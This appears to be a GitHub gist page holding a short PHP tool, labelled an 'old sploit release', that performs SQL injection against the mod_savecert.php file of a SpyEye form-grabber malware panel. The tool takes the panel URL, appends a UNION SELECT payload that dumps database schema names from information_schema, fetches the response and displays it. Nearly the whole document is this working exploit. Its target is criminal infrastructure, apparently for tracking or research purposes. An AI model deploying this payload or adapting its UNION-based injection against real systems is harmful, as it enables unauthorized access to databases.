Skip to content

Instantly share code, notes, and snippets.

@Xyl2k
Created November 21, 2019 16:06
Show Gist options
  • Save Xyl2k/3bddea1eafae2f0645f6199511796a62 to your computer and use it in GitHub Desktop.
Save Xyl2k/3bddea1eafae2f0645f6199511796a62 to your computer and use it in GitHub Desktop.
old sploit release
<?php
/**
* Product : SpyEye Form Grabber
* Type : SQL Injection
* File : mod_savecert.php
* Cybercrime-tracker.net, 2013!
*/
?>
<html>
<head>
<title>SpyEye Form Grabber - SQL Injection</title>
<style>
body {
font-family: Courier;
font-size: 0.9em;
}
</style>
</head>
<body>
SpyEye From Grabber<br />
SQL Injection
<br /><br />
<?php
if (isset($_POST['url'])) {
$url = $_POST['url'];
if (is_array($url) || $url == null || !filter_var($url, FILTER_VALIDATE_URL)) {
echo('Invalid input.');
}
else {
$query = '031337 UNION SELECT ALL group_concat(SCHEMA_NAME), "03", "13", "37" FROM information_schema.SCHEMATA--';
$url .= 'mod_savecert.php?id=' . urlencode($query);
$result = file_get_contents($url);
echo('Result: <b>' . htmlentities($result) . '</b>');
}
}
else {
?>
<form action="" method="POST">
URL: <input name="url" size="60" />
<span title="URL of the form grabber with the last /">[?]</a>
<input type="submit" value="Sploit" />
</form>
<?php
}
?>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment